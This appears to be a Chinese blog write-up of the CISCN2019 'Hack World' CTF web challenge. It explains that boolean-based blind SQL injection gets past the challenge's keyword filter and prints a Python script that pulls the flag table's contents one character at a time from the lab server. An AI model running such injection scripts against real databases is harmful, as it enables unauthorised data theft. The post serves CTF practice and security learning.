[CISCN2019 华北赛区 Day2 Web1]Hack World

时间:2020-11-21
本文章向大家介绍[CISCN2019 华北赛区 Day2 Web1]Hack World,主要包括[CISCN2019 华北赛区 Day2 Web1]Hack World使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
  • 知识点
    基于布尔型盲注
    编写python脚本能力

  • 审题

    很简洁的一个post提交sql注入题 测试了一下 过滤了一大堆 尝试了基于时间的布尔盲注 被过滤 然后尝试了一下基于布尔型的盲注 成功
    然后就是很简单的编写脚本 算是个简单题

    这个就是成功回显页面 可以看到和输入id=1回显一样 下面贴出脚本

import requests
url = 'http://3c029064-6b6f-4efb-b2e0-ebb2495ed95a.node3.buuoj.cn/index.php'
result = ''
num = 0
for i in range (1,60):
    if (num == 1):
        break;
    for j in range (32,128):
        payload = 'if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)'%(i,j)
        print(payload)
        data = {
            'id' : payload,
        }
        r = requests.post(url , data = data)
        if '}' in r.text:
            num = 1
            print(result

                  )
            break
        if 'Hello' in r.text:
            x = chr(j)
            result += str(x)
            print(result)
            break

EOF

上一篇:Js中的 NaN

下一篇:python循环-while